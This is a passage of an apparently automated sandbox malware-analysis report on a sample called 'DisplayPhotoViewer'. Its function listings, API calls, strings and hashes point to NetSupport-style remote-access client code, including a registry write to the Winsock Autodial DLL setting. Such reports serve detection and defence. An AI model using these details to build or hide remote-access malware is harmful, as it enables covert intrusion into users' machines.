                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 443534600-4289949731
                                                                                                    • Opcode ID: bb88493714d86c1132c9a348e76e0b2ab63ff07c92f1ac6bb14338b640528a69
                                                                                                    • Instruction ID: 1eb77cffd938af695757bff06b8df45d918709cb31701de168ea04a508439263
                                                                                                    • Opcode Fuzzy Hash: bb88493714d86c1132c9a348e76e0b2ab63ff07c92f1ac6bb14338b640528a69
                                                                                                    • Instruction Fuzzy Hash: CD31F732B046009FF715DE5CDC80E9EF7EAEBD16A4B10462EF491C7681D770A84187A2
                                                                                                    Function 1100F860 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F879
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CA5
                                                                                                      • Part of subcall function 11155C90: __CxxThrowException@8.LIBCMT ref: 11155CBA
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CCB
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F89A
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F8B5
                                                                                                    • _memmove.LIBCMT ref: 1100F91D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 443534600-4289949731
                                                                                                    • Opcode ID: 67551b1c33a973f07bcd07aba3e868078bda846387dde07c3b25198ac87bbad8
                                                                                                    • Instruction ID: 68722e301ae5bf40bc777e56d5d863e1e39730bb403d67601ea891b8e125e259
                                                                                                    • Opcode Fuzzy Hash: 67551b1c33a973f07bcd07aba3e868078bda846387dde07c3b25198ac87bbad8
                                                                                                    • Instruction Fuzzy Hash: BC31F732B006159FE715CE6CE880BAAF7E9EF907A4B10066EE552CB240D770E94097A2
                                                                                                    Function 111396D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 111397C1
                                                                                                      • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
                                                                                                    • Beep.KERNEL32(00000000,00000000), ref: 11139785
                                                                                                    • MessageBeep.USER32(00000000), ref: 11139797
                                                                                                    • MessageBeep.USER32(-00000010), ref: 111397AB
                                                                                                    • MessageBeep.USER32(00000000), ref: 111397CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                                    • String ID: 1000,50
                                                                                                    • API String ID: 3904670044-1941404556
                                                                                                    • Opcode ID: 99152a87e6605a48c587a8d876ab2ca485590b50a652ee5fec0b9c03dcfdc099
                                                                                                    • Instruction ID: 7175f2ac5e4aa87d29df7a8371da3e4a7cc7bd782565aaa9059e1cfd818bc150
                                                                                                    • Opcode Fuzzy Hash: 99152a87e6605a48c587a8d876ab2ca485590b50a652ee5fec0b9c03dcfdc099
                                                                                                    • Instruction Fuzzy Hash: 19214726941A9942E6430DA4ADC4BFEFA5F8BC277AF000070EC68D1488F625D0118B62
                                                                                                    Function 110914B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$_calloc_malloc
                                                                                                    • String ID: SAMS Teach
                                                                                                    • API String ID: 2764978295-1519287674
                                                                                                    • Opcode ID: bbdfa197d122dddc5e760b1b15feb032d823ef04abfb22b4eb3256f58350d1a2
                                                                                                    • Instruction ID: 9919973bb0d9ea56a1ca0a3536a983dbb7cb4393f3ca263b6c681cfcfb6bc050
                                                                                                    • Opcode Fuzzy Hash: bbdfa197d122dddc5e760b1b15feb032d823ef04abfb22b4eb3256f58350d1a2
                                                                                                    • Instruction Fuzzy Hash: E8214879A00246AFC701DB69CC90FFFFBB8DF46328F000158FC2597280EA35A90582A1
                                                                                                    Function 1105D410 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: ..\CTL32\configplus.cpp$result <= buflen
                                                                                                    • API String ID: 2111968516-413741496
                                                                                                    • Opcode ID: 82a7b8ce8581fba54c8347dbdac76557fe6edf73b07710abf64bb0ea1c60cc2d
                                                                                                    • Instruction ID: d434dea95b173de1dda137e4ed9d70a2ca523af289c8d3ef3649eef93b958720
                                                                                                    • Opcode Fuzzy Hash: 82a7b8ce8581fba54c8347dbdac76557fe6edf73b07710abf64bb0ea1c60cc2d
                                                                                                    • Instruction Fuzzy Hash: 55212C35A001466BC781CE289C94DEEBBE59BC2328B14C392FD6947290DF31F9058791
                                                                                                    Function 1105F940 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32(?), ref: 1105F96E
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Services\Winsock\Autodial,00000000,00000000,00000000), ref: 1105F996
                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AutodialDllName32,00000000,?,111E12E1,00000010), ref: 1105FA80
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1105FA8D
                                                                                                      • Part of subcall function 11139370: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value$CloseOpenQueryVersion
                                                                                                    • String ID: AutodialDllName32$System\CurrentControlSet\Services\Winsock\Autodial
                                                                                                    • API String ID: 387276457-2283657482
                                                                                                    • Opcode ID: e22624d642e8d921c2b811a0cc19726f269b9388cb6052047739566162a0b115
                                                                                                    • Instruction ID: 3776714795edbc3776d638561de404754c5d0d2a9cc6283694a001484c378f97
                                                                                                    • Opcode Fuzzy Hash: e22624d642e8d921c2b811a0cc19726f269b9388cb6052047739566162a0b115
                                                                                                    • Instruction Fuzzy Hash: 1E3192B0E1021A9FEB51CBA0CC84FEDF7B9AB49348F5040E8F90DA6281D7746D85CB56
                                                                                                    Function 110555D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,218EC38C,75A92AF0,00000001,000000C8,11055AA5,?,?,00000000,?,?), ref: 11055628
                                                                                                    • timeGetTime.WINMM ref: 1105565B
                                                                                                      • Part of subcall function 11138650: _strncpy.LIBCMT ref: 11138692
                                                                                                    • SetEvent.KERNEL32(?), ref: 110556A4
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110556AB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSectionwsprintf$EnterErrorEventExitLastLeaveMessageProcessTime_malloc_memset_strncpytime
                                                                                                    • String ID: CltReconn.cpp$gMain.pReconnThread
                                                                                                    • API String ID: 3397837340-2390197369
                                                                                                    • Opcode ID: 34f201c7e8294dcd1ed569f3db5d0321b2a899ec542b597797a217de09b3d411
                                                                                                    • Instruction ID: e60ddbd284271ff3c54df429e580a7f336de7e7426624e9493bec2987c04d5b4
                                                                                                    • Opcode Fuzzy Hash: 34f201c7e8294dcd1ed569f3db5d0321b2a899ec542b597797a217de09b3d411
                                                                                                    • Instruction Fuzzy Hash: 1231BCB2D01615DFCB50CFA8E880B9EBBF4FB48714F01856AE815E7344D771A900CBA1
                                                                                                    Function 110B31A0 Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 110B31D2
                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110B31D9
                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 110B31E0
                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 110B31E7
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B31F6
                                                                                                    • GetSystemMetrics.USER32(?), ref: 110B3204
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110B3213
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                    • String ID:
                                                                                                    • API String ID: 3136151823-0
                                                                                                    • Opcode ID: d07a2bd3bdd7468483f94f714aba912f2e3b4f3983168ae5408b4c5ce31560e1
                                                                                                    • Instruction ID: 3f07df0d522763fe5102794122014a385b33cf1c391a97fc767f73123e36ccd0
                                                                                                    • Opcode Fuzzy Hash: d07a2bd3bdd7468483f94f714aba912f2e3b4f3983168ae5408b4c5ce31560e1
                                                                                                    • Instruction Fuzzy Hash: 4D310875E0030A9FDB14DFA9C881A9EFBF1AF88710F20842EE955A7340DA74A941CF58
                                                                                                    Function 11009520 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110CA450: wvsprintfA.USER32(?,?,1103CDC6), ref: 110CA482
                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110095D6
                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110095EB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • IsA(), xrefs: 1100958D, 110095B5
                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110095E5
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009588, 110095B0
                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009559
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 863766397-2085542942
                                                                                                    • Opcode ID: 51c40d69a26ed4bfba167a4c7e60b1b7c73a66a33188c21e77654478c20279db
                                                                                                    • Instruction ID: 599b03551c42d5d032f790a55b3f9c2c9a245fbf6a119485c46fe5824df50334
                                                                                                    • Opcode Fuzzy Hash: 51c40d69a26ed4bfba167a4c7e60b1b7c73a66a33188c21e77654478c20279db
                                                                                                    • Instruction Fuzzy Hash: DB214C79A0061AABDB00DB95DC41FDEF3B9FF98614F004259E925B3280EB746A04CFA1
                                                                                                    Function 1105F0F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowPlacement.USER32(?,0000002C,?,75BF7AA0,00000000), ref: 1105F13D
                                                                                                    • wsprintfA.USER32 ref: 1105F179
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ErrorExitLastMessagePlacementProcessWindow
                                                                                                    • String ID: %d %d %d %d %d %d %d %d %d$,$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1558849722-4034562342
                                                                                                    • Opcode ID: 2874f0fa1e080f679f5563b85c9d265ed8ec63c80b9ea10bea1b645286976c99
                                                                                                    • Instruction ID: 1bf87f6305d01663ca76318fac5e88f2ef7aa50553b54e5b6486dc758f7d0ba4
                                                                                                    • Opcode Fuzzy Hash: 2874f0fa1e080f679f5563b85c9d265ed8ec63c80b9ea10bea1b645286976c99
                                                                                                    • Instruction Fuzzy Hash: C82129B5A11119ABCB44CF99DC85EAFF7B9AF88304F144159F919A3240D670A9018BA1
                                                                                                    Function 110F1300 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110F1325
                                                                                                    • GetACP.KERNEL32(0BA6C1B8,DBCS,Charset,932=*128,?,?,00000000), ref: 110F138E
                                                                                                      • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEC0
                                                                                                      • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEF0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
